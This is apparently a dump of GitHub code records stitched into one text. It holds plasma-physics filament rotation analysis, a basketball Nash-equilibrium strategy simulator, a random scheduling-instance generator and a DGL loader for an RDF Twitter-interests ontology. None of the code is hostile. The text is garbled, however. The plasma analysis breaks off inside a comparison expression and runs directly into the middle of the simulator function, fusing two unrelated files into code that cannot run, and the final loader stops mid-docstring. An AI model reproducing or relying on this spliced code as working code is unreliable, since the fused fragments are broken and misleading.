#a_rad=np.gradient(np.gradient(gpi_results['data']['Position max radial']['data'][index_elm,:]))[ind_time]/sampling_time**2\n \n #Interpolating the shearing rate for the filament position\n v_pol_prime=np.interp(gpi_results['data']['Position max radial']['data'][index_elm,ind_time],\n shear_results['coord']['r']['values'][ind_not_nan_v_pol_prime],\n shear_results['data']['v_pol_prime_smooth']['data'][index_elm,:][ind_not_nan_v_pol_prime])\n \n v_pol_prime_error=np.interp(gpi_results['data']['Position max radial']['data'][index_elm,ind_time],\n shear_results['coord']['r']['values'][ind_not_nan_v_pol_prime],\n shear_results['data']['v_pol_prime_smooth']['error'][index_elm,:][ind_not_nan_v_pol_prime])\n \n #Interpolating the shearing rate for the filament position\n v_pol_prime_prime=np.interp(gpi_results['data']['Position max radial']['data'][index_elm,ind_time],\n shear_results['coord']['r']['values'][ind_not_nan_v_pol_prime_prime],\n shear_results['data']['v_pol_prime_prime_smooth']['data'][index_elm,:][ind_not_nan_v_pol_prime_prime])\n \n v_pol_prime_prime_error=np.interp(gpi_results['data']['Position max radial']['data'][index_elm,ind_time],\n shear_results['coord']['r']['values'][ind_not_nan_v_pol_prime_prime],\n shear_results['data']['v_pol_prime_prime_smooth']['error'][index_elm,:][ind_not_nan_v_pol_prime_prime])\n\n \n if test:\n print('v_pol_prime_delta_error',v_pol_prime_error/v_pol_prime)\n print('v_rad_delta_error',v_rad_error/v_rad)\n print('v_pol_prime_prime_delta_error',v_pol_prime_prime_error/v_pol_prime_prime)\n print('time_prop_delta_error',time_prop_error/time_prop)\n print('\\n')\n \n #Calculating the time dependent model\n f=(v_pol_prime + 0*time_prop*v_pol_prime_prime*v_rad)\n \n delta_f=(v_pol_prime_error+\n np.abs(v_pol_prime_prime*v_rad)*time_prop_error+\n np.abs(1+time_prop*v_rad)*v_pol_prime_prime_error+\n np.abs(time_prop*v_pol_prime_prime)*v_rad_error)\n \n g=(1+(v_pol_prime*time_prop)**2)\n delta_g=np.abs(2*v_pol_prime*time_prop**2)*v_pol_prime_error+np.abs(2*v_pol_prime**2*time_prop)*time_prop_error\n omega_model[ind_time-ind1]=f/g\n omega_model_error[ind_time-ind1]=np.abs(delta_f/g)+np.abs(f/g**2)*delta_g\n \n #The time dependent shear is dphi/dt=d(vpol't)/dt=v_pol_prime=t*v_pol_prime_prime*v_rad)\n shear_tdep_model[ind_time-ind1]=v_pol_prime\n shear_tdep_model_1st_term[ind_time-ind1]=v_pol_prime\n shear_tdep_model_2nd_term[ind_time-ind1]=time_prop*v_pol_prime_prime*v_rad\n \n shear_tdep_model_error[ind_time-ind1]=delta_f\n \n if test:\n print(omega_model_error/omega_model)\n \n \n #Should be checked whether the angular valocity should be integrated here\n #model_angular_velocity['data']['Angular velocity time dep model']['data'].append(np.sum(omega_model))\n ind_not_nan = ~np.isnan(omega_model)\n try:\n ind_max=np.argmin((omega_model[ind_not_nan]))\n model_angular_velocity['data']['Angular velocity time dep model']['data'].append(omega_model[ind_not_nan][ind_max])\n model_angular_velocity['data']['Angular velocity time dep model']['error'].append(omega_model_error[ind_not_nan][ind_max])\n except:\n model_angular_velocity['data']['Angular velocity time dep model']['data'].append(np.nan)\n model_angular_velocity['data']['Angular velocity time dep model']['error'].append(np.nan)\n \n #try:\n if True:\n first_average=np.mean(shear_tdep_model_1st_term[ind_not_nan])\n second_average=np.mean(shear_tdep_model_2nd_term[ind_not_nan])\n model_angular_velocity['data']['First term over second term']['data'].append(first_average/second_average)\n #except:\n # model_angular_velocity['data']['First term over second term']['data'].append(np.nan)\n try:\n ind_max=np.argmin((shear_tdep_model[ind_not_nan]))\n model_angular_velocity['data']['Shearing rate time dep max neg']['data'].append(shear_tdep_model[ind_not_nan][ind_max])\n model_angular_velocity['data']['Shearing rate time dep max neg']['error'].append(shear_tdep_model_error[ind_not_nan][ind_max])\n except:\n model_angular_velocity['data']['Shearing rate time dep max neg']['data'].append(np.nan)\n model_angular_velocity['data']['Shearing rate time dep max neg']['error'].append(np.nan)\n \n try:\n ind_max=np.argmax((shear_tdep_model[ind_not_nan]))\n model_angular_velocity['data']['Shearing rate time dep max pos']['data'].append(shear_tdep_model[ind_not_nan][ind_max])\n model_angular_velocity['data']['Shearing rate time dep max pos']['error'].append(shear_tdep_model_error[ind_not_nan][ind_max])\n except:\n model_angular_velocity['data']['Shearing rate time dep max pos']['data'].append(np.nan)\n model_angular_velocity['data']['Shearing rate time dep max pos']['error'].append(np.nan) \n \n if plot_model_time_series:\n time_vec=gpi_results['coord']['time']['values'][ind1:ind2+1]\n omega_exp=gpi_results['data']['Angular velocity ccf FLAP log']['data'][index_elm,ind1:ind2+1]\n fig,ax=plt.subplots(figsize=(8.5/2.54,8.5/2.54/np.sqrt(2)))\n \n ax.plot(time_vec*1e6,shear_tdep_model/1e3, label='$\\omega_{shear}$')\n ax.plot(time_vec*1e6,omega_model/1e3, label='$\\omega_{model}$')\n ax.plot(time_vec*1e6,omega_exp/1e3, label='$\\omega_{exp}$')\n \n ax.set_xlabel('$t-t_{ELM}$ [${\\mu s}$]')\n ax.set_ylabel('$\\omega [krad/s]$')\n ax.set_title('Angular velocities')\n ax.legend()\n plt.tight_layout(pad=0.1)\n pdf_time_series.savefig()\n ind_not_nan=np.where(np.logical_and(~np.isnan(omega_exp),~np.isnan(shear_tdep_model)))\n \n shear_tdep_model_full_time=np.zeros(len(gpi_results['coord']['time']['values']))\n shear_tdep_model_full_time[ind1:ind2+1]=shear_tdep_model\n model_angular_velocity['data']['Average time series model']['data'].append(list(shear_tdep_model_full_time))\n\n data_ang_vel=np.zeros(len(gpi_results['coord']['time']['values']))\n data_ang_vel[ind1:ind2+1]=gpi_results['data']['Angular velocity ccf FLAP log']['data'][index_elm,ind1:ind2+1]\n model_angular_velocity['data']['Average time series exp']['data'].append(list(data_ang_vel))\n \n try:\n model_angular_velocity['data']['Shearing rate time dep avg']['data'].append(np.mean(shear_tdep_model[ind_not_nan]))\n model_angular_velocity['data']['Shearing rate time dep avg']['error'].append(np.mean(shear_tdep_model_error[ind_not_nan])/np.sqrt(np.sum(ind_not_nan)))\n except:\n model_angular_velocity['data']['Shearing rate time dep avg']['data'].append(np.nan)\n model_angular_velocity['data']['Shearing rate time dep avg']['error'].append(np.nan)\n\n omega_exp=gpi_results['data']['Angular velocity ccf FLAP log']['data'][index_elm,ind1:ind2+1]\n ind_not_nan_omega_exp = ~np.isnan(omega_exp)\n \n try:\n ind_max=np.argmax(omega_exp[ind_not_nan_omega_exp])\n omega_max=omega_exp[ind_not_nan_omega_exp][ind_max]\n \n ind_min=np.argmin(omega_exp[ind_not_nan_omega_exp])\n omega_min=omega_exp[ind_not_nan_omega_exp][ind_min]\n \n omega_avg=np.mean(omega_exp[ind_not_nan_omega_exp])\n omega_t0 = np.mean(omega_exp[ind_not_nan_omega_exp][0:1])\n except:\n omega_max=np.nan\n omega_min=np.nan\n omega_avg=np.nan\n omega_t0=np.nan\n \n model_angular_velocity['data']['Angular velocity experimental max neg']['data'].append(omega_min)\n model_angular_velocity['data']['Angular velocity experimental max neg']['error'].append(np.pi/180.*sampling_time) \n \n model_angular_velocity['data']['Angular velocity experimental max pos']['data'].append(omega_max)\n model_angular_velocity['data']['Angular velocity experimental max pos']['error'].append(np.pi/180.*sampling_time)\n \n model_angular_velocity['data']['Angular velocity experimental max neg change t0']['data'].append(omega_min-omega_t0)\n model_angular_velocity['data']['Angular velocity experimental max neg change t0']['error'].append(np.pi/180./sampling_time)\n\n model_angular_velocity['data']['Angular velocity experimental max pos change t0']['data'].append(omega_max-omega_t0)\n model_angular_velocity['data']['Angular velocity experimental max pos change t0']['error'].append(np.pi/180./sampling_time)\n \n model_angular_velocity['data']['Angular velocity experimental avg']['data'].append(omega_avg)\n model_angular_velocity['data']['Angular velocity experimental avg']['error'].append(np.pi/180./sampling_time)\n \n model_angular_velocity['data']['Angular velocity experimental avg change t0']['data'].append(omega_avg-omega_t0)\n model_angular_velocity['data']['Angular velocity experimental avg change t0']['error'].append(np.pi/180./sampling_time)\n\n \n try:\n model_angular_velocity['derived']['Filament rotation angle']['data'].append(np.sum(omega_exp[ind_not_nan_omega_exp]*sampling_time))\n model_angular_velocity['derived']['Filament rotation angle']['error'].append(np.pi/180./sampling_time*np.sqrt(np.sum(ind_not_nan_omega_exp)))\n except:\n model_angular_velocity['derived']['Filament total rotation angle']['data'].append(np.nan)\n model_angular_velocity['derived']['Filament total rotation angle']['error'].append(np.nan)\n \n for key1 in ['dep','indep']:\n for key2 in ['avg','max']:\n try:\n form_factor=(model_angular_velocity['data']['Angular velocity experimental '+key2]['data'][-1]/\n model_angular_velocity['data']['Shearing rate time '+key1+' '+key2]['data'][-1])\n model_angular_velocity['data']['Form factor time '+key1+' '+key2]['data'].append(form_factor)\n \n form_factor_error_1=np.abs(form_factor*model_angular_velocity['data']['Angular velocity experimental '+key2]['error'][-1]/model_angular_velocity['data']['Angular velocity experimental '+key2]['data'][-1])\n form_factor_error_2=np.abs(form_factor*model_angular_velocity['data']['Shearing rate time '+key1+' '+key2]['error'][-1]/model_angular_velocity['data']['Shearing rate time '+key1+' '+key2]['data'][-1])\n model_angular_velocity['data']['Form factor time '+key1+' '+key2]['error'].append(form_factor_error_1+form_factor_error_2)\n except:\n model_angular_velocity['data']['Form factor time '+key1+' '+key2]['data'].append(np.nan)\n model_angular_velocity['data']['Form factor time '+key1+' '+key2]['error'].append(np.nan)\n\n else: #If the filament lifetime is too short (default:<12.5us (5frames))\n for key in model_angular_velocity['data'].keys():\n if key not in exclude_keys_from_nans:\n model_angular_velocity['data'][key]['data'].append(np.nan)\n model_angular_velocity['data'][key]['error'].append(np.nan)\n \n model_angular_velocity['derived']['Filament time range']['data'].append(np.nan)\n model_angular_velocity['derived']['Filament time range']['derived']['duration']['data'].append(np.nan)\n \n model_angular_velocity['derived']['Filament radial range']['data'].append([np.nan,np.nan])\n model_angular_velocity['derived']['Filament radial range']['error'].append([np.nan,np.nan])\n \n model_angular_velocity['derived']['Filament total rotation angle']['data'].append(np.nan)\n model_angular_velocity['derived']['Filament total rotation angle']['error'].append(np.nan) \n \n \n \n #Transforming everything to numpy arrays (numpy cannot append to the input array)\n for key in model_angular_velocity['data'].keys():\n model_angular_velocity['data'][key]['data']=np.asarray(model_angular_velocity['data'][key]['data'])\n model_angular_velocity['data'][key]['error']=np.asarray(model_angular_velocity['data'][key]['error'])\n \n model_angular_velocity['derived']['Filament time range']['data']=np.asarray(model_angular_velocity['derived']['Filament time range']['data'])\n model_angular_velocity['derived']['Filament time range']['derived']['duration']['data']=np.asarray(model_angular_velocity['derived']['Filament time range']['derived']['duration']['data'])\n model_angular_velocity['derived']['Filament time range']['derived']['duration']['error']=np.asarray(model_angular_velocity['derived']['Filament time range']['derived']['duration']['error']) \n \n \n if return_results:\n return model_angular_velocity\n \n if pdf or plot:\n\n plot_x_vs_y=[['Angular velocity experimental max','Form factor time indep max'],\n ['Angular velocity experimental max','Form factor time dep max'],\n ['Angular velocity experimental avg','Form factor time indep avg'],\n ['Angular velocity experimental avg','Form factor time dep avg'],\n # ['Angular velocity experimental','Angular velocity time indep model'],\n # ['Angular velocity experimental','Angular velocity time dep model'],\n \n ['Angular velocity experimental max change t0','Form factor time indep avg'],\n ['Angular velocity experimental max change t0','Form factor time dep avg'],\n \n ['Angular velocity experimental avg change t0','Form factor time indep avg'],\n ['Angular velocity experimental avg change t0','Form factor time dep avg'],\n ]\n \n if plot_for_publication:\n plot_x_vs_y=[['Angular velocity experimental avg change t0','Shearing rate time dep avg'],\n ['Angular velocity experimental avg change t0','Angular velocity time dep model'],\n \n ['Angular velocity experimental max neg change t0','Shearing rate time dep max neg'],\n ['Angular velocity experimental max pos change t0','Shearing rate time dep max pos'],\n ]\n \n for ind_plot in range(len(plot_x_vs_y)):\n fig,ax=plt.subplots(figsize=(8.5/2.54,8.5/2.54/np.sqrt(2)))\n xdata=model_angular_velocity['data'][plot_x_vs_y[ind_plot][0]]['data']/1e3\n ydata=model_angular_velocity['data'][plot_x_vs_y[ind_plot][1]]['data']/1e3\n \n x_err=model_angular_velocity['data'][plot_x_vs_y[ind_plot][0]]['error']/1e3\n y_err=model_angular_velocity['data'][plot_x_vs_y[ind_plot][1]]['error']/1e3\n ind_not_nan=np.logical_and(~np.isnan(xdata),\n ~np.isnan(ydata))\n \n xdata=xdata[ind_not_nan]\n x_err=x_err[ind_not_nan]\n \n ydata=ydata[ind_not_nan]\n y_err=y_err[ind_not_nan]\n \n xdata_std=np.sqrt(np.var(xdata))\n ydata_std=np.sqrt(np.var(ydata))\n \n ind_keep=np.where(np.logical_and(np.abs(xdata-np.mean(xdata))= 0.01)\n bad_off = np.where(last_off < 0.01)\n\n last_off[bad_off] = 0\n last_off[good_off] = last_off[good_off]/np.sum(last_off[good_off])\n\n good_def = np.where(last_def >= 0.01)\n bad_def = np.where(last_def < 0.01)\n\n last_def[bad_def] = 0\n last_def[good_def] = last_def[good_def]/np.sum(last_def[good_def])\n\n # for i,p in enumerate(last_off):\n # if(p > 0.05):\n # summ_off += p\n # thing_off[mdf.index[i]] = p\n # for i,p in enumerate(last_def):\n # if(p > 0.05):\n # summ_def += p\n # thing_def[colnames[i]] = p\n # return thing_def,thing_off\n\n # for i,p in enumerate(last_off):\n # thing_off[mdf.index[i]] = p\n # for i,p in enumerate(last_def):\n # thing_def[colnames[i]] = p\n\n # # return thing_def,thing_off\n\n return last_def, last_off\n\n#print(get_noisy_nash(mdf))\n\ndeff,offf = get_noisy_nash(mdf)\n# deff2,offf2 = get_noisy_nash(m2df)\n\ndef sample_strategy(mixed):\n opts = np.arange(len(mixed))\n return np.random.choice(opts, p = mixed)\n\n\n\np = sample_strategy(deff)\np2 = sample_strategy(offf)\nprint(mdf.columns.values[p])\nprint(mdf.index[p2])\n\nold_strat_def = def_strat = deff\nold_strat_off = off_strat = offf\n\n# def_strat = None\n# off_strat = None\n\nw = 0.2\nv = 0.7\nprint(deff)\nprint(offf)\nnum_poss = 10\nfor poss in range(num_poss):\n current_def = sample_strategy(def_strat)\n current_off = sample_strategy(off_strat)\n\n print(\"Play during possession {}\".format(poss))\n print(\"\\t\" + str(mdf.columns.values[current_def]))\n print(\"\\t\" + str(mdf.index[current_off]))\n\n add_def = np.zeros(len(old_strat_def))\n add_def[current_def] = 1\n old_strat_def = w*old_strat_def + (1-w)*add_def\n\n add_off = np.zeros(len(old_strat_off))\n add_off[current_off] = 1\n old_strat_off = w*old_strat_off + (1-w)*add_off\n\n gamevals = add_noise_to_matrix(mdf)\n best_response_off = np.zeros(len(old_strat_off))\n best_response_off[np.argmax(gamevals.dot(old_strat_def))] = 1\n\n best_response_def = np.zeros(len(old_strat_def))\n best_response_def[np.argmin((old_strat_off.T).dot(gamevals))] = 1\n\n def_strat = v*def_strat + (1-v)*best_response_def\n off_strat = v*off_strat + (1-v)*best_response_off\n ","repo_name":"chakrabarti/bballai","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"31077320524","text":"import json\nfrom random import randint\nimport sys\nimport random\n\noptions = {\n 'T': [100, 120],\n 'I': [2, 4],\n 'K': [4, 6],\n 'J': [4, 6],\n 'S': [1, 2],\n 'reldate': [10, 50],\n 'due': [60, 80],\n 'nsa0': [10, 20],\n 'sa0': [5, 10],\n 'csa': [30, 60],\n 'cnsa': [15, 30],\n 'c': [60, 100],\n 'd': [2, 20]\n}\n\n\ndef generate_instance(options):\n def rset_rng(set_name):\n return [ix for ix in range(randint(options[set_name][0], options[set_name][1]))]\n\n def rparam3d(s1, s2, s3, name):\n return [[[randint(options[name][0], options[name][1]) for e3 in s3] for e2 in s2] for e1 in s1]\n\n def batch_rset(set_letters_str):\n return [rset_rng(sn) for sn in list(set_letters_str)]\n\n def rparam2d(s1, s2, name):\n return [[randint(options[name][0], options[name][1]) for e2 in s2] for e1 in s1]\n\n def rparam1d(s1, name):\n return [randint(options[name][0], options[name][1]) for e1 in s1]\n\n T, I, K, J, S = batch_rset('TIKJS')\n\n reldate = rparam3d(I, K, J, 'reldate')\n ek = [[[sum(1 if reldate[i][k][j] == t else 0 for i in I for j in J) for t in T] for s in S] for k in K]\n due = rparam3d(I, K, J, 'due')\n\n nsa0 = rparam2d(K, S, 'nsa0')\n sa0 = rparam1d(K, 'sa0')\n csa = rparam1d(K, 'csa')\n cnsa = rparam2d(K, S, 'cnsa')\n c = rparam1d(I, 'c')\n d = rparam2d(K, S, 'd')\n\n return dict(T=T, I=I, K=K, J=J, S=S, ek=ek, due=due, nsa0=nsa0, sa0=sa0, csa=csa, cnsa=cnsa, c=c, d=d)\n\n\ndef serialize_to_json(instance, out_filename):\n with open(out_filename, 'w') as fp:\n json.dump(instance, fp, indent=4, sort_keys=True)\n\n\ndef main(args):\n random.seed(23)\n instance = generate_instance(options)\n serialize_to_json(instance, 'instance1.json')\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"0x17/BET-WF","sub_path":"instance_generator.py","file_name":"instance_generator.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5671099046","text":"import os\r\nfrom collections import OrderedDict\r\nimport itertools\r\nimport abc\r\nimport re\r\ntry:\r\n import rdflib as rdf\r\nexcept ImportError:\r\n pass\r\n\r\nimport networkx as nx\r\nimport numpy as np\r\nfrom ontology import Ontology\r\nimport dgl\r\nimport dgl.backend as F\r\nfrom dgl.data import DGLBuiltinDataset\r\nfrom dgl.data.utils import save_graphs, load_graphs, save_info, load_info, _get_dgl_url\r\nfrom dgl.data.utils import generate_mask_tensor, idx2mask, deprecate_property, deprecate_class\r\n\r\nRENAME_DICT = {\r\n 'type' : 'rdftype',\r\n 'rev-type' : 'rev-rdftype',\r\n}\r\nclass Entity:\r\n \"\"\"Class for entities\r\n Parameters\r\n ----------\r\n id : str\r\n ID of this entity\r\n cls : str\r\n Type of this entity\r\n \"\"\"\r\n def __init__(self, e_id, cls):\r\n self.id = e_id\r\n self.cls = cls\r\n\r\n def __str__(self):\r\n return '{}/{}'.format(self.cls, self.id)\r\n\r\nclass Relation:\r\n \"\"\"Class for relations\r\n Parameters\r\n ----------\r\n cls : str\r\n Type of this relation\r\n \"\"\"\r\n def __init__(self, cls):\r\n self.cls = cls\r\n\r\n def __str__(self):\r\n return str(self.cls)\r\n\r\nclass RDFGraphDataset(DGLBuiltinDataset):\r\n #'../data/deneme/'\r\n def __init__(self, name=None, url=None,\r\n raw_dir='../data/deneme/',\r\n force_reload=False,\r\n verbose=True):\r\n self._insert_reverse = True\r\n self._print_every = 10000\r\n #self.save_path = \"../data/deneme/\"\r\n super(RDFGraphDataset, self).__init__(name, url,\r\n raw_dir=raw_dir,\r\n force_reload=force_reload,\r\n verbose=verbose)\r\n\r\n def process(self):\r\n raw_tuples = self.load_raw_tuples(self.raw_path)\r\n self.process_raw_tuples(raw_tuples)\r\n\r\n def load_raw_tuples(self, root_path):\r\n \"\"\"Loading raw RDF dataset\r\n\r\n Parameters\r\n ----------\r\n root_path : str\r\n Root path containing the data\r\n\r\n Returns\r\n -------\r\n Loaded rdf data\r\n \"\"\"\r\n raw_rdf_graphs = []\r\n for _, filename in enumerate([root_path]):\r\n \"\"\"fmt = None\r\n if filename.endswith('nt'):\r\n fmt = 'nt'\r\n elif filename.endswith('n3'):\r\n fmt = 'n3'\r\n elif filename.endswith('rdf'):\r\n fmt = 'application/rdf+xml'\r\n if fmt is None:\r\n continue\"\"\"\r\n #g = rdf.Graph()\r\n print(\"Hadi bakalım\")\r\n ontology = Ontology(filename)\r\n interests = ontology.get_all_interests()\r\n print(\"Geliyor\")\r\n #print('Parsing file %s ...' % filename)\r\n \"\"\"mentions = ontology.get_all_interactions('mention')\r\n retweets = ontology.get_all_interactions('retweet')\r\n concated = mentions + retweets\"\"\"\r\n #g.parse(filename, format=fmt)\r\n raw_rdf_graphs.append(interests)\r\n #raw_rdf_graphs.append(retweets)\r\n return itertools.chain(*raw_rdf_graphs)\r\n\r\n def process_raw_tuples(self, raw_tuples):\r\n \"\"\"Processing raw RDF dataset\r\n\r\n Parameters\r\n ----------\r\n raw_tuples:\r\n Raw rdf tuples\r\n root_path: str\r\n Root path containing the data\r\n \"\"\"\r\n mg = nx.MultiDiGraph()\r\n ent_classes = OrderedDict()\r\n rel_classes = OrderedDict()\r\n entities = OrderedDict()\r\n src = []\r\n dst = []\r\n ntid = []\r\n etid = []\r\n sorted_tuples = []\r\n for t in raw_tuples:\r\n sorted_tuples.append(t)\r\n sorted_tuples.sort()\r\n\r\n for i, (sbj,obj, pred) in enumerate(sorted_tuples):\r\n if self.verbose and i % self._print_every == 0:\r\n print('Processed %d tuples, found %d valid tuples.' % (i, len(src)))\r\n\r\n sbjent = self.parse_entity(sbj)\r\n rel = self.parse_relation(pred)\r\n objent = self.parse_entity(obj)\r\n processed = self.process_tuple((sbj, pred, obj), sbjent, rel, objent)\r\n if processed is None:\r\n # ignored\r\n continue\r\n # meta graph\r\n sbjclsid = _get_id(ent_classes, sbjent.cls)\r\n objclsid = _get_id(ent_classes, objent.cls)\r\n relclsid = _get_id(rel_classes, rel.cls)\r\n mg.add_edge(sbjent.cls, objent.cls, key=rel.cls)\r\n if self._insert_reverse:\r\n mg.add_edge(objent.cls, sbjent.cls, key='rev-%s' % rel.cls)\r\n # instance graph\r\n src_id = _get_id(entities, str(sbjent))\r\n if len(entities) > len(ntid): # found new entity\r\n ntid.append(sbjclsid)\r\n dst_id = _get_id(entities, str(objent))\r\n if len(entities) > len(ntid): # found new entity\r\n ntid.append(objclsid)\r\n src.append(src_id)\r\n dst.append(dst_id)\r\n etid.append(relclsid)\r\n\r\n src = np.asarray(src)\r\n dst = np.asarray(dst)\r\n ntid = np.asarray(ntid)\r\n etid = np.asarray(etid)\r\n ntypes = list(ent_classes.keys())\r\n etypes = list(rel_classes.keys())\r\n\r\n # add reverse edge with reverse relation\r\n if self._insert_reverse:\r\n if self.verbose:\r\n print('Adding reverse edges ...')\r\n newsrc = np.hstack([src, dst])\r\n newdst = np.hstack([dst, src])\r\n src = newsrc\r\n dst = newdst\r\n etid = np.hstack([etid, etid + len(etypes)])\r\n etypes.extend(['rev-%s' % t for t in etypes])\r\n\r\n hg = self.build_graph(mg, src, dst, ntid, etid, ntypes, etypes)\r\n idmap = F.asnumpy(hg.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data[dgl.NID])\r\n glb2lcl = {glbid: lclid for lclid, glbid in enumerate(idmap)}\r\n\r\n def findidfn(ent):\r\n if ent not in entities:\r\n return None\r\n else:\r\n return glb2lcl[entities[ent]]\r\n\r\n self._hg = hg\r\n train_idx, test_idx, labels, num_classes = self.load_data_split(findidfn)\r\n\r\n train_mask = idx2mask(train_idx, self._hg.number_of_nodes(\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"))\r\n test_mask = idx2mask(test_idx, self._hg.number_of_nodes(\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"))\r\n labels = F.tensor(labels, F.data_type_dict['int64'])\r\n\r\n train_mask = generate_mask_tensor(train_mask)\r\n test_mask = generate_mask_tensor(test_mask)\r\n self._hg.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data['train_mask'] = train_mask\r\n self._hg.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data['test_mask'] = test_mask\r\n self._hg.nodes[\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"].data['labels'] = labels\r\n self._num_classes = num_classes\r\n\r\n # save for compatability\r\n self._train_idx = F.tensor(train_idx)\r\n self._test_idx = F.tensor(test_idx)\r\n self._labels = labels\r\n\r\n\r\n def build_graph(self, mg, src, dst, ntid, etid, ntypes, etypes):\r\n \"\"\"Build the graphs\r\n\r\n Parameters\r\n ----------\r\n mg: MultiDiGraph\r\n Input graph\r\n src: Numpy array\r\n Source nodes\r\n dst: Numpy array\r\n Destination nodes\r\n ntid: Numpy array\r\n Node types for each node\r\n etid: Numpy array\r\n Edge types for each edge\r\n ntypes: list\r\n Node types\r\n etypes: list\r\n Edge types\r\n\r\n Returns\r\n -------\r\n g: DGLGraph\r\n \"\"\"\r\n # create homo graph\r\n if self.verbose:\r\n print('Creating one whole graph ...')\r\n g = dgl.graph((src, dst))\r\n g.ndata[dgl.NTYPE] = F.tensor(ntid)\r\n g.edata[dgl.ETYPE] = F.tensor(etid)\r\n if self.verbose:\r\n print('Total #nodes:', g.number_of_nodes())\r\n print('Total #edges:', g.number_of_edges())\r\n\r\n # rename names such as 'type' so that they an be used as keys\r\n # to nn.ModuleDict\r\n etypes = [RENAME_DICT.get(ty, ty) for ty in etypes]\r\n mg_edges = mg.edges(keys=True)\r\n mg = nx.MultiDiGraph()\r\n for sty, dty, ety in mg_edges:\r\n mg.add_edge(sty, dty, key=RENAME_DICT.get(ety, ety))\r\n\r\n # convert to heterograph\r\n if self.verbose:\r\n print('Convert to heterograph ...')\r\n hg = dgl.to_heterogeneous(g,\r\n ntypes,\r\n etypes,\r\n metagraph=mg)\r\n if self.verbose:\r\n print('#Node types:', len(hg.ntypes))\r\n print('#Canonical edge types:', len(hg.etypes))\r\n print('#Unique edge type names:', len(set(hg.etypes)))\r\n return hg\r\n\r\n def load_data_split(self, ent2id):\r\n \"\"\"Load data split\r\n\r\n Parameters\r\n ----------\r\n ent2id: func\r\n A function mapping entity to id\r\n root_path: str\r\n Root path containing the data\r\n\r\n Return\r\n ------\r\n train_idx: Numpy array\r\n Training set\r\n test_idx: Numpy array\r\n Testing set\r\n labels: Numpy array\r\n Labels\r\n num_classes: int\r\n Number of classes\r\n \"\"\"\r\n label_dict = {}\r\n labels = np.zeros((self._hg.number_of_nodes(\"/www.semanticweb.org/gokce/ontologies/2021/11/twitter-interests\"),)) - 1\r\n train_idx = self.parse_idx_file(\r\n os.path.join('../data/deneme/trainingSet.tsv'),\r\n ent2id, label_dict, labels)\r\n test_idx = self.parse_idx_file(\r\n os.path.join('../data/deneme/testSet.tsv'),\r\n ent2id, label_dict, labels)\r\n train_idx = np.array(train_idx)\r\n test_idx = np.array(test_idx)\r\n labels = np.array(labels)\r\n num_classes = len(label_dict)\r\n return train_idx, test_idx, labels, num_classes\r\n\r\n def parse_idx_file(self, filename, ent2id, label_dict, labels):\r\n \"\"\"Parse idx files\r\n\r\n Parameters\r\n ----------\r\n filename: str\r\n File to parse\r\n ent2id: func\r\n A function mapping entity to id\r\n label_dict: dict\r\n Map label to label id\r\n labels: dict\r\n Map entity id to label id\r\n\r\n Return\r\n ------\r\n idx: list\r\n Entity idss\r\n \"\"\"\r\n idx = []\r\n with open(filename, 'r') as f:\r\n for i, line in enumerate(f):\r\n if i == 0:\r\n continue # first line is the header\r\n sample, label = self.process_idx_file_line(line)\r\n # person, _, label = line.strip().split('\\t')\r\n ent = self.parse_entity(sample)\r\n entid = ent2id(str(ent))\r\n if entid is None:\r\n print('Warning: entity \"%s\" does not have any valid links associated. Ignored.' % str(ent))\r\n else:\r\n idx.append(entid)\r\n lblid = _get_id(label_dict, label)\r\n labels[entid] = lblid\r\n return idx\r\n\r\n def save(self):\r\n \"\"\"save the graph list and the labels\"\"\"\r\n graph_path = os.path.join(\"../data/deneme/\",\r\n self.save_name + '.bin')\r\n info_path = os.path.join(\"../data/deneme/\",\r\n self.save_name + '.pkl')\r\n save_graphs(str(graph_path), self._hg)\r\n\r\n\r\n def load(self):\r\n \"\"\"load the graph list and the labels from disk\"\"\"\r\n graph_path = os.path.join(\"../data/deneme/\",\r\n self.save_name + '.bin')\r\n info_path = os.path.join(\"../data/deneme/\",\r\n self.save_name + '.pkl')\r\n graphs, _ = load_graphs(str(graph_path))\r\n\r\n def __getitem__(self, idx):\r\n r\"\"\"Gets the graph object\r\n \"\"\"\r\n g = self._hg\r\n return g\r\n\r\n def __len__(self):\r\n r\"\"\"The number of graphs in the dataset.\"\"\"\r\n return 1\r\n\r\n @property\r\n def save_name(self):\r\n return self.name + '_dgl_graph'\r\n\r\n @property\r\n def graph(self):\r\n deprecate_property('dataset.graph', 'hg = dataset[0]')\r\n return self._hg\r\n\r\n @property\r\n def predict_category(self):\r\n return self._predict_category\r\n\r\n @property\r\n def num_classes(self):\r\n return self._num_classes\r\n\r\n @property\r\n def train_idx(self):\r\n deprecate_property('dataset.train_idx', 'train_mask = g.ndata[\\'train_mask\\']')\r\n return self._train_idx\r\n\r\n @property\r\n def test_idx(self):\r\n deprecate_property('dataset.test_idx', 'train_mask = g.ndata[\\'test_mask\\']')\r\n return self._test_idx\r\n\r\n @property\r\n def labels(self):\r\n deprecate_property('dataset.labels', 'train_mask = g.ndata[\\'labels\\']')\r\n return self._labels\r\n\r\n @abc.abstractmethod\r\n def parse_entity(self, term):\r\n \"\"\"Parse one entity from an RDF term.\r\n Return None if the term does not represent a valid entity and the\r\n whole tuple should be ignored.\r\n Parameters\r\n ----------\r\n term : rdflib.term.Identifier\r\n RDF term\r\n Returns\r\n -------\r\n Entity or None\r\n An entity.\r\n \"\"\"\r\n pass\r\n\r\n @abc.abstractmethod\r\n def parse_relation(self, term):\r\n \"\"\"Parse one relation from an RDF term.\r\n Return None if the term does not represent a valid relation and the\r\n whole tuple should be ignored.\r\n Parameters\r\n ----------\r\n term : rdflib.term.Identifier\r\n RDF term\r\n Returns\r\n -------\r\n Relation or None\r\n A relation\r\n \"\"\"\r\n pass\r\n\r\n @abc.abstractmethod\r\n def process_tuple(self, raw_tuple, sbj, rel, obj):\r\n \"\"\"Process the tuple.\r\n Return (Entity, Relation, Entity) tuple for as the 